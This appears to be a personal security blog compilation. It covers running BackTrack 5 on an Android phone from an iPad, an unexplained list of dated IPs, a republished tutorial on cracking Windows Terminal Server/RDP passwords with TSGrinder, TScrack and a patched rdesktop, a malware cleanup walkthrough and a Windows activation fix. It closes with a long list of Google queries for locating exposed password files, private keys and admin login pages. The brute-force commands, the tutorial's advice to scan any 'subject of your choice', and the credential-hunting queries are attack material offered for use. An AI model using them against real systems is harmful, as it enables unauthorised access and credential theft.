Backtrack 5 on iPad1

Well, not exactly but close enough. This weekend project just got really interesting. Who would ever think of an innocent Apple iPad would be "pentesting" in a Starbucks. Ok, I really didn't run the proof of concept at a Starbucks, I did it in my personal sandbox.  But in theory it can be done for "research" and for academic purposes.   This actually started with just trying to get BT5 on my phone, a rooted Android.  But after getting it to work, and running it for a few hours, I got frustrated with the small text and difficulty to enter text and special key strokes.

So in it's simplest concept, fire up the VNC server on the Android, fire up a VNC client on the iPad (tablet), and remote control to the Android. So let's light this firecracker...


Hardware:
1. Android Smart Phone (rooted): tested on AT&T HTC Inspire. Android Froyo with 8GB MicroSD.
2. Apple iPad: tested with iOS5. any working iPad will do or in this case any tablet device.


Software:
1. BackTrack 5 for Android:  http://forum.xda-developers.com/showthread.php?t=1079898  - RTFM (google it if you don't know), follow instructions on how to load it on your Android.
2. Terminal Emulator for Android: this is a must to get BT5 running. It has to run rooted. A simple "SU" command on the "$" prompt will switch you to a bash "#".
3. VNC for iPad: the free VNC lite will do.  You do not need the VNC Viewer ($9.99).

Notes:
1. After you get BT5 running on Android, make sure your VNC server is running.  If you forgot to activate it during the initial startup, just type "startvnc".
2. The usual default port for VNC is "5900", for the BT5 on Android its "5901".
3. default username and password is both "root"
4. Obviously, the iPad and the Android have to be in the same Wifi network in the same subnet.  Your "subjects" also have to be in the same Wifi network.  So, you might find yourself in a pissing contest with another pentester if you happen run into one.
5. Caveat:  You'll have a stealth appearance, nobody would suspect that an iPad can actually pentest, specially if you keep your Android in your bag or pocket. But you'll have 2 devices on an open network! You better have a good grip of two operating systems - Android and iOS.
6. So you say, why not just use a laptop...?? True, I agree totally. But what's the fun in that.  Plus, I really like travelling light.
7. This is really a proof of concept, if you can come up of a more creative way if using your BT5 on your Android, let me know.

Happy Hunting.

Friends of the Friendly Decoded

2011.10.16::H.99.2.210.47-HQ
2011.10.16::J.98.154.35.204-HQ
2011.10.13::J.166.205.139.167-HW
2011.10.15::J.71.165.187.204-50M3CRUS7
2011.10.15::J.173.51.110.6-P9CK1NGH0U53
2011.10.15::MJ.76.214.13.207-HQ
2011.10.13::MJ.75.208.211.221::166.205.33.13::166.250.63.9::166.250.32.48

Terminal Service Play Ground

Tutorial: MS Terminal Server Cracking Note: This article is from the Ethical Hacker Network.  An excellent article was written by Chris Gates, more articles can be found under the collection of his columns.  I took the liberty of adding additional info just like i do with all my blogs.  None of my blog post are totally done.  As I discover fixes and improvements, I will update them.  If you want to do any MS Terminal Server cracking you basically have your choice of three tools that can do it for you; 1. TSgrinder. 2. TScrack. 3. and a patched version of RDesktop.  Video: Terminal Server / RDP Password Cracking, takes you step-by-step through the concepts, tools and usage. Tools: 1. TSGrinder is readily available from http://www.hammerofgod.com/download.html. 2. TSCrack you’ll have to google for as it is not readily available anymore. 3. Rdesktop v1.41 can be downloaded from http://www.rdesktop.org/ and you’ll need the patch from foofus.net http://www.foofus.net/jmk/rdesktop.html. Part 1: MS Terminal Services Overview Hacking Exposed Windows Server 2003 goes a great overview, I won’t plagiarize it all here, so check it out for me details and the references section of this paper for some MS references. Prior to Terminal Services, Windows did not provide the ability to run code remotely in the processor space of the server. Another way to put this is there was no way to have an “interactive” session on the server. There were tools like wsremote or psexec or VNC. If an attacker got a non administrator level account on a remote machine they could map shares and copy files but had a difficult time running code on the server. Now, with Terminal Services, an attacker can log on as a non privileged user and run exploit local exploit code via the Terminal Services GUI. These attacks used to be fairly limited to local physical attacks or from users who actually logging into your domain but now if the server has Terminal Services (2000 server 2003 server) or RDP (Windows XP) running the attack vector increases. Terminal Services by default listen on port 3389 (but can be changed by editing the registry). If you want to change the listening port, edit this registry key: \HKLM\System\CurrentControlSet\Control\Terminal Server\WinStationRDP-TCP Value : PortNUmber REG_DWORD=3389 To turn on Terminal Server/RDP, edit this registry key (or to turn it on via command line): reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 With this command you can enable the RDP Service. Password Cracking Basics  There are three types of password attacks: 1. Brute Force: A cryptanalysis technique or other kind of attack method involving an exhaustive procedure that tries all possibilities, one-by-one. [1] For example, the program might follow a sequence like this: "aaaaaaaa" "aaaaaaab" "aaaaaaac" ... Until the password is found 2. Dictionary Attack: An attack that tries all of the phrases or words in a dictionary, trying to crack a password or key. A dictionary attack uses a predefined list of words compared to a brute force attack that tries all possible combinations. [2] 3. Hybrid Attack: A hybrid attack is a mixture of a brute force attach and a dictionary attack. There are many different ways a hybrid attack can be performed, in it's simplest form a hybrid attack may simply add a couple of numbers to the end of each dictionary word tried, this increases the number of tested combinations without having to resort to a true brute force attack. Cracking software will often use a combination or selection of all three methods to try and guess your password. [3] Part 1: Terminal Services Enumeration Fire up Google,  https://enccrypted.google.com - always search encrypted Search  for “/TSWeb/default.htm” Figure 1.1: Output of a google search for /TSWeb/default.htm Pick a subject of your choise and fire up Nmap.  You can nmap for port 3389 Figure 1.2: A Nmap scan looking for port 3389 open on the Class C. Figure 1.3: Results on the Nmap Scan looking for open port 3389. You can use ProbeTS (http://www.hammerofgod.com/download/probets.zip): Figure 1.4: The output of probeTS. Terminal Services Connections Let’s see what a regular Terminal Services connection looks like. Figure 1.5: the Terminal Services/RDP Client on Windows 2000 Pro to a Windows 2000 Terminal Server. Figure 1.6: Issuing a command over the Terminal Services Client. Part 2: TSGrinder From the TSGrinder website: “TSGrinder is the first production Terminal Server bruteforce tool. The main idea here is that the Administrator account, since it cannot be locked out for local logons, can be brute forced. Also having an encrypted channel to the TS logon process sure helps to keep IDS from catching the attempts. TSGrinder is a "dictionary" based attack tool, but it does have some interesting features like "l337" conversion, and supports multiple attack windows from a single dictionary file. It supports multiple password attempts in the same connection, and allows you to specify how many times to try a username/password combination within a particular connection. Also, the problem you describe can be exacerbated in that administrator account can be brute-forced without creating a log entry, by attempting 5 logons and disconnecting before Windows disconnects and logs after the sixth failure.” Let’s see TSGrinder in action. I had to use the Windows XP RDP client on Windows2000 SP4 to get TSGrinder to work properly. I did not need roboclient.zip that it mentions on the website. Figure 2.1: TSGrinder being run with no arguments. Figure 2.2: TSGrinder using a dictionary attack against the administrator account. Figure 2.3: A failed attempt. Figure 2.4: if TSGrinder guesses the password it will log into the terminal services and immediately disconnect. Figure 2.5: A successful attempt with TSGrinder. Figure 2.6: TSGrinder supports 2 threads. Here you can see two threads running the attack. Figure 2.7: A successful attempt with TSGrinder that used 2 threads to run the attack. Part 3: TScrack From the TScrack documentation: “The Windows Terminal Services facility offers graphical desktop sessions to remote clients. Terminal Services enables users to work in a windows session that exists on the server. The client functionality is basically reduced to the functionality of a terminal, all it does is display the session screen, and collect user input. TScrack applies AI technology (Artificial Neural Networks) to scrape the screen contents of the graphical logon, in order to enable a simple dictionary based cracking algorithm to perform efficiently against the graphically presented logon dialogs and message boxes. This is very similar to the technology used i.e. in Optical Character Recognition (OCR), Face- and Image recognition in general. TScrack was written for two purposes: a) To provide a tool to assess password security of MS RDP servers b) As proof of concept code, to point out that graphical logons are by no means secure from automated cracking / password guessing tools Figure 3.1: TScrack being run with no arguments. Figure 3.2: TScrack being run against a Windows Server 2003 Terminal Server Figure 3.3: TScrack successfully cracking the password Figure 3.4: TScrack also does multithreading cracking, use the –t option for 2 connections Figure 3.5: TScrack with two simultaneous connections running Figure 3.6: TScrack successfully cracking the password TScrack was updated to v2.1 to include brute force attacks (something TSGrinder does not do). Figure 3.7: TScrack in Brute force mode (-B option & max word length of 6) **Note 1: I attempted to use the –N (no logging option). Windows Server 2003 still logged every failed attempt to log on (which is good). Figure 3.8: TScrack in Brute force mode with the –N (no logging) option Figure 3.9: Even with –N enabled Windows Server 2003 logged the attempts. I did not test every configuration on every type of OS, I just noticed it was logging the attempt and shared the info. **Note 2: I also had to drastically change the default password policy on Server 2003 to put an easy to crack password. I chose a password of “chrisg” as the password I wanted to brute force. Figure 3.10: Here is the default password policy for Windows Server 2003 Figure 3.11: What I changed the password policy to, to allow “chrisg” as a password **Note 3: I had to run TScrack 2.1 on windows 2000 machine; it wasn’t working properly on Windows XP SP2. Also, If you are getting a MSRDP.OCX error, then uninstall TScrack using the “-U” option then reinstalling by issuing TScrack.exe –h. Part 4: Rdesktop & BruteForcing RDP with Rdesktop patch Download rdesktop version 1.41 from the website: http://www.rdesktop.org/%20 http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.4.1.tar.gz?download%20 Download the rdp-bruteforce patch from foofus.net: http://www.foofus.net/jmk/rdesktop.html%20 http://www.foofus.net/jmk/tools/rdp-brute-force-r422.diff%20 Paste the patch into the source directory and apply the patch SegFault:/Users/chrisgates/Desktop root# cd rdesktop-1.4.1 SegFault:/Users/chrisgates/Desktop/rdesktop-1.4.1 root# patch -p1 -i rdp-brute-force-r422.diff patching file orders.c patching file orders.h patching file rdesktop.c patching file rdesktop.h patching file rdp.c patching file secure.c patching file xkeymap.c compile and install rdesktop: ./configure make sudo make install Start X-Windows/X-Darwin/X11(I used X-Darwin installed using fink using Mac OS X Tiger). Shouldn’t be an issue if you are using an linux flavor with a GUI. Now start Rdesktop with your passlist and user or userlist: SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ rdesktop -u administrator -p pass.txt 192.168.0.105 **you'll need to run this from X-Darwin/X-Windows/X-11, if you run it from the command line it will say something like: ERROR: Failed to open display: If everything is working right you'll see it opening the Rdesktop trying to log in and then exiting. Check your command line output to see if you were able to guess the password. Figure 4.1: Running Rdesktop with no parameters gives you the help menu. Figure 4.2: Issuing the command line parameters to start Rdestop in *nix in XDarwin. Figure 4.3: Rdestop brute forcing the accounts. The following output was against an XP Pro SP2 host. With XP if the user is currently logged in, they will be forced to log off if you connect to the machine over RDP. SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ rdesktop -u noone -p pass.txt 192.168.0.105 Starting dictionary attack against server 192.168.0.105 ------------------------------------------------------- Retrieved connection termination packet. Account credentials are NOT valid. Retrieved connection termination packet. [failure] User "noone" Password "test" Retrieved connection termination packet. Account credentials are NOT valid. Retrieved connection termination packet. ---SNIP--- [failure] User "noone" Password "admin" Retrieved connection termination packet. Account credentials are NOT valid. Retrieved connection termination packet. [failure] User "noone" Password "administrator" Valid credentials, however, another user is currently logged on. [success] User "noone" Password "noone" SegFault:~/Desktop/rdesktop-1.4.1 chrisgates$ Figure 4.4: The command line output of the successful attack against XP SP2 but with the user logged in. Let’s see Rdesktop against a Windows Server 2003. Figure 4.5: Rdesktop against Windows Server 2003 against the “chris” account. Figure 4.6: Rdesktop successfully cracking the password with a dictionary attack. References Terminal Services References: http://www.microsoft.com/windowsserver2003/techinfo/overview/termserv.mspx%20 TSGrinder References: TSGrinder: http://www.hammerofgod.com/download/tsgrinder-2.03.zip http://www.ethicalhacker.net/www.blackhat.com/presentations/bh-asia-03/bh-asia-03-mullen.pdf%20 http://www.msterminalservices.org/articles/Brute-Force-Hacking-Terminal-Server-Environments.html%20 Hacking Exposed Windows Server 2003 CH 12. TSCrack References: http://web.mac.com/opticrealm/iWeb/asurobot/My%20Cyber%20Attack%20Papers/My%20Cyber%20Attack%20Papers_files/remote%20dictionary%20tscrack%20Nov_6_2005.pdf Hacking Exposed Windows Server 2003 CH 12. Rdesktop References: Rdesktop: http://www.rdesktop.org/%20&%20http://prdownloads.sourceforge.net/rdesktop/rdesktop-1.4.1.tar.gz?download%20 Rdesktop patch by JMK of foofus: http://www.foofus.net/jmk/rdesktop.html%20&%20http://www.foofus.net/jmk/tools/rdp-brute-force-r422.diff%20 Footnotes [1] http://www.onlinetravelsafe.com/choosing_passwords.php [2] http://www.sans.org/resources/glossary.php [3] http://www.onlinetravelsafe.com/choosing_passwords.php

Victimized by an Anti-Virus Trojan

A non-techie friend approached me with an laptop issue.  This is your typical common internet surfer problem,”My laptop is just so slow all of a sudden, I think something is wrong with it.  I let my 5 yr old nephew play with it.”

Long story short – it was an Core i3 and processor activity was pegged at 100%, and an annoying “OpenCloud AV” was reporting it found 6 trojans on it!!  Yeah right 6, how about 200 or more.  This OpenCloud AV is the culprit, and this are the steps I took to try and get rid of it.  Mind you, I didn’t really want to spend time doing this, so this is the most minimal steps.  Oh BTW, I didn’t see any legitimate AV running to protect the laptop.  This is probably how it got infected in the first place.

This is a Windows 7 Home Premium Toshiba Laptop.

Here’s the simple game plan:

1.        Google info about the suspected culprit - In this case “OpenCloud AV” – as it turned out, it surely is an open cloud since it sends info to internet. Free info for all!

2.       Boot to Safe Mode – delete, clean-up, kick, shout do whatever you have to catch all the files in there.  They will be hidden or disguised as legitimate files.  Through my search I ended up in a website that offers an automatic tool to remove it! Hahaha! Nice try! I wasn’t born yesterday.  It actually also offered manual removal instructions, but warned extensively of the dangers of doing so. Here’s an excerpt.

“Please, note that manual removal of OpenCloud AV virus is a procedure with high complexity and can not always guarantee a full removal of the virus, due to the fact that some objects can stay hidden or may become reanimated automatically after incomplete removal. What’s more, lack of the required skills and even the slightest deviation from the removal guides may result in irreparable system corruption. That’s the reason it’s strongly advised automatic removal of OpenCloud AV virus, which will save your time and avoid any system corruptions and ensure the desired result.”

BTW, I checked the manual instructions against the infected laptop, none of the instructions applied to the problem.  By default, Windows will hide system files and folders from view.  You have to change your settings to show all that.  Also double check the contents of %AppData%,  %Programs% and %Temp% . Delete any unknown or junk looking files.  If you are not sure, save them somewhere else just in case you need them back. 

3.       Double check your “RUN” registry entry and Startup folder – The registry is a good source to find where those hidden files are on your system drive.   If original RUN hive on the registry clean of any Trojan looking files, fire up “msconfig” and look in there.  Sometimes the Trojan is smart enough to hide somewhere else.  Clean up the registry and startup last, as I mentioned above, they are a very good source of information as were the nasty files are.

4.       Install an Anti-Virus and scan - Twice! A full hard drive scan.  Let it run take all day.  Then defrag the hard drive, delete any system dumps and delete the pagefile.

5.       Windows Update and Patch -  This is very basic folks.  You change oil and check your car every so often right? Pilots run pre-flight checks right? The Internet net is crawling with bad things out to get you than your highways and airways.   There should be a web surfing license just like a driver’s license and a pilot’s license.

6.       Prevention   - turn on your automatic updates for both Windows and Anti-Virus.

I have a laptop I use on the Internet with absolutely no malware protection.  I just keep it fully updated, prevent going anything I did not personally solicit and use a web browser with appropriate add-ons to prevent code running without me knowing about it.  I have not been infected.  The point is, with anything that you decide to do, acquire enough information before doing it.   You don’t have to be an expert race car driver to drive a car, but you just enough skill to keep yourself and others safe.

Additional notes: 
It is possible that Windows 7's Licensing Store may be corrupt or unreadable.  If it is,ou might get a "This copy of Windows is not genuine" message above your system tray, even if you know you have a legit copy.  You will need your Activation Key for the steps below.  They are usually located on the green Microsoft license stickers found on workstations or at the bottom of a laptop.  Try the below steps to recreate the Store.

1) Open an Internet Browser
2) Type: %windir%\system32 into the browser address bar.
3) Find the file CMD.exe
4) Right-Click on CMD.exe and select 'Run as Administrator'
5) Type: net stop sppsvc   (It may ask you if you are sure, select yes)
Note: the Software Protection service may not be running, this is ok.
6) Type: cd %windir%\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\SoftwareProtectionPlatform
7) Type: rename tokens.dat tokens.bar
8) Type: cd %windir%\system32
9) Type: net start sppsvc
10) Type: slui.exe
11) After a couple of seconds Windows Activation dialog will appear. You may be asked to re-activate and/or re-enter your product key or Activation may
occur automatically.

If you have a product key, then you can reactivate Windows 7.
1. Click the Start button2. Type: slui.exe 3 and hit the Enter key3. Type in the Product key from the sticker on your computer4.  Click the Next button.5. You will be asked if want to Activate, click ok

You can also activate by phone  by following these steps.
1. Click the Start button2. Type: slui.exe 4 and hit the Enter key3. Select your location in the drop down menu and click the Next button4. The next screen provides the number to call to Activate by Phone
How to contact a Microsoft Product Activation Center:
http://support.microsoft.com/default.aspx/kb/950929/en=us

Goodly-Googly! Let's search like pros!

Google advanced search operators, operator combinations, and related uses:

• link:URL = lists other pages that link to the URL.
• related:URL = lists other pages that are related to the URL.
• site:domain.com “search term = restricts search results to the given domain.
• allinurl:WORDS = shows only pages with all search terms in the url.
• inurl:WORD = like allinurl: but filters the URL based on the first term only.
• allintitle:WORD = shows only results with terms in title.
• intitle:WORD = similar to allintitle, but only for the next word.
• cache:URL = will show the Google cached version of the URL.
• info:URL = will show a page containing links to related searches, backlinks, and pages containing the url. This is the same as typing the url into the search box.
• filetype:SOMEFILETYPE = will restrict searches to that filetype
• -filetype:SOMEFILETYPE = will remove that file type from the search.
• site:www.somesite.net “+www.somesite.net” = shows you how many pages of your site are indexed by google
• allintext: = searches only within text of pages, but not in the links or page title
• allinlinks: = searches only within links, not text or title
• WordA OR WordB = search for either the word A or B
• “Word” OR “Phrase” = search exact word or phrase
• WordA -WordB = find word A but filter results that include word B
• WordA +WordB = results much contain both Word A and Word B
• ~WORD = looks up the word and its synonyms
• ~WORD -WORD = looks up only the synonyms to the word

Old school Google Hacks list

Code:

admin account info" filetype:log
!Host=*.* intext:enc_UserPassword=* ext:pcf
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"AutoCreate=TRUE password=*"
"http://*:*@www" domainname
"index of/" "ws_ftp.ini" "parent directory"
"liveice configuration file" ext:cfg -site:sourceforge.net
"parent directory" +proftpdpasswd
Duclassified" -site:duware.com "DUware All Rights reserved"
duclassmate" -site:duware.com
Dudirectory" -site:duware.com
dudownload" -site:duware.com
Elite Forum Version *.*"
Link Department"
"sets mode: +k"
"your password is" filetype:log
DUpaypal" -site:duware.com
allinurl: admin mdb
auth_user_file.txt
config.php
eggdrop filetype:user user
enable password | secret "current configuration" -intext:the
etc (index.of)
ext:asa | ext:bak intext:uid intext:pwd -"uid..pwd" database | server | dsn
ext:inc "pwd=" "UID="
ext:ini eudora.ini
ext:ini Version=4.0.0.4 password
ext:passwd -intext:the -sample -example
ext:txt inurl:unattend.txt
ext:yml database inurl:config
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:ldb admin
filetype:log "See `ipsec --copyright"
filetype:log inurl:"password.log"
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:netrc password
filetype:pass pass intext:userid
filetype:pem intext:private
filetype:properties inurl:db intext:password
filetype:pwd service
filetype:pwl pwl
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:xls username password email
htpasswd
htpasswd / htgroup
htpasswd / htpasswd.bak
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"EZGuestbook"
intext:"Web Wiz Journal"
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"Index of" passwords modified
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com
intitle:index.of administrators.pwd
intitle:Index.of etc shadow
intitle:index.of intext:"secring.skr"|"secring.pgp"|"secring.bak"
intitle:rapidshare intext:login
inurl:"calendars?ri?t/users.txt"
inurl:"editor/list.asp" | inurl:"database_editor.asp" | inurl:"login.asa" "are set"
inurl:"GRC.DAT" intext:"password"
inurl:"Sites.dat"+"PASS="
inurl:"slapd.conf" intext:"credentials" -manpage -"Manual Page" -man: -sample
inurl:"slapd.conf" intext:"rootpw" -manpage -"Manual Page" -man: -sample
inurl:"wvdial.conf" intext:"password"
inurl:/db/main.mdb
inurl:/wwwboard
inurl:/yabb/Members/Admin.dat
inurl:ccbill filetype:log
inurl:cgi-bin inurl:calendar.cfg
inurl:chap-secrets -cvs
inurl:config.php dbuname dbpass
inurl:filezilla.xml -cvs
inurl:lilo.conf filetype:conf password -tatercounter2000 -bootpwd -man
inurl:nuke filetype:sql
inurl:ospfd.conf intext:password -sample -test -tutorial -download
inurl:pap-secrets -cvs
inurl:pass.dat
inurl:perform filetype:ini
inurl:perform.ini filetype:ini
inurl:secring ext:skr | ext:pgp | ext:bak
inurl:server.cfg rcon password
inurl:ventrilo_srv.ini adminpassword
inurl:vtund.conf intext:pass -cvs
inurl:zebra.conf intext:password -sample -test -tutorial -download
LeapFTP intitle:"index.of./" sites.ini modified
master.passwd
mysql history files
NickServ registration passwords
passlist
passlist.txt (a better way)
passwd
passwd / etc (reliable)
people.lst
psyBNC config files
pwd.db
server-dbs "intitle:index of"
signin filetype:url
spwd.db / passwd
trillian.ini
wwwboard WebAdmin inurl:passwd.txt wwwboard|webadmin
[WFClient] Password= filetype:ica
intitle:"remote assessment" OpenAanval Console
intitle:opengroupware.org "resistance is obsolete" "Report Bugs" "Username" "password"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Emergisoft web applications are a part of our"
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"inspanel" intitle:"login" -"cannot" "Login ID" -site:inspediumsoft.com
"intitle:3300 Integrated Communications Platform" inurl:main.htm
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"Microsoft CRM : Unsupported Browser Version"
"OPENSRS Domain Management" inurl:manage.cgi
"pcANYWHERE EXPRESS Java Client"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
CuteNews" "2003..2005 CutePHP"
DWMail" password intitle:dwmail
Merak Mail Server Software" -.gov -.mil -.edu -site:merakmailserver.com
Midmart Messageboard" "Administrator Login"
Monster Top List" MTL numrange:200-
UebiMiau" -site:sourceforge.net
"site info for" "Enter Admin Password"
"SquirrelMail version" "By the SquirrelMail development Team"
"SysCP - login"
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This section is for Administrators only. If you are an administrator then please"
"ttawlogin.cgi/?action="
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
(intitle:"Please login - Forums
UBB.threads")|(inurl:login.php "ubb")
(intitle:"Please login - Forums
WWWThreads")|(inurl:"wwwthreads/login.php")|(inurl:"wwwthreads/login.pl?Cat=")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
4images Administration Control Panel
allintitle:"Welcome to the Cyclades"
allinurl:"exchange/logon.asp"
allinurl:wps/portal/ login
ASP.login_aspx "ASP.NET_SessionId"
CGI:IRC Login
ext:cgi intitle:"control panel" "enter your owner password to continue!"
ez Publish administration
filetype:php inurl:"webeditor.php"
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:r2w r2w
intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:"vbulletin" inurl:admincp
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"AlternC Desktop"
intitle:"Athens Authentication Point"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"Dell Remote Access Controller"
intitle:"Docutek ERes - Admin Login" -edu
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"Login -
Easy File Sharing Web Server"
intitle:"Login Forum
AnyBoard" intitle:"If you are a new user:" intext:"Forum
AnyBoard" inurl:gochat -edu
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"MX Control Console" "If you can't remember"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"phpPgAdmin - Login" Language
intitle:"PHProjekt - login" login password
intitle:"please login" "your password is *"
intitle:"Remote Desktop Web Connection" inurl:tsweb
intitle:"SFXAdmin - sfx_global" | intitle:"SFXAdmin - sfx_local" | intitle:"SFXAdmin - sfx_test"
intitle:"SHOUTcast Administrator" inurl:admin.cgi
intitle:"site administration: please log in" "site designed by emarketsouth"
intitle:"Supero Doctor III" -inurl:supermicro
intitle:"SuSE Linux Openexchange Server" "Please activate Javas?ri?t!"
intitle:"teamspeak server-administration
intitle:"Tomcat Server Administration"
intitle:"TOPdesk ApplicationServer"
intitle:"TUTOS Login"
intitle:"TWIG Login"
intitle:"vhost" intext:"vHost . 2000-2004"
intitle:"Virtual Server Administration System"
intitle:"VisNetic WebMail" inurl:"/mail/"
intitle:"VitalQIP IP Management System"
intitle:"VMware Management Interface:" inurl:"vmware/en/"
intitle:"VNC viewer for Java"
intitle:"web-cyradm"|"by Luc de Louw" "This is only for authorized users" -tar.gz -site:web-cyradm.org
intitle:"WebLogic Server" intitle:"Console Login" inurl:console
intitle:"Welcome Site/User Administrator" "Please select the language" -demos
intitle:"Welcome to Mailtraq WebMail"
intitle:"welcome to netware *" -site:novell.com
intitle:"WorldClient" intext:"? (2003|2004) Alt-N Technologies."
intitle:"xams 0.0.0..15 - Login"
intitle:"XcAuctionLite" | "DRIVEN BY XCENT" Lite inurl:admin
intitle:"XMail Web Administration Interface" intext:Login intext:password
intitle:"Zope Help System" inurl:HelpSys
intitle:"ZyXEL Prestige Router" "Enter password"
intitle:"inc. vpn 3000 concentrator"
intitle:("TrackerCam Live Video")|("TrackerCam Application Login")|("Trackercam Remote") -trackercam.com
intitle:asterisk.management.portal web-access
intitle:endymion.sak?.mail.login.page | inurl:sake.servlet
intitle:Group-Office "Enter your username and password to login"
intitle:ilohamail "
IlohaMail"
intitle:ilohamail intext:"Version 0.8.10" "
IlohaMail"
intitle:IMP inurl:imp/index.php3
intitle:Login * Webmailer
intitle:Login intext:"RT is ? Copyright"
intitle:Node.List Win32.Version.3.11
intitle:Novell intitle:WebAccess "Copyright *-* Novell, Inc"
intitle:open-xchange inurl:login.pl
intitle:Ovislink inurl:private/login
intitle:phpnews.login
intitle:plesk inurl:login.php3
inurl:"/admin/configuration. php?" Mystore
inurl:"/slxweb.dll/external?name=(custportal|webticketcust)"
inurl:"1220/parse_xml.cgi?"
inurl:"631/admin" (inurl:"op=*") | (intitle:CUPS)
inurl:":10000" intext:webmin
inurl:"Activex/default.htm" "Demo"
inurl:"calendar.asp?action=login"
inurl:"default/login.php" intitle:"kerio"
inurl:"gs/adminlogin.aspx"
inurl:"php121login.php"
inurl:"suse/login.pl"
inurl:"typo3/index.php?u=" -demo
inurl:"usysinfo?login=true"
inurl:"utilities/TreeView.asp"
inurl:"vsadmin/login" | inurl:"vsadmin/admin" inurl:.php|.asp

Code:

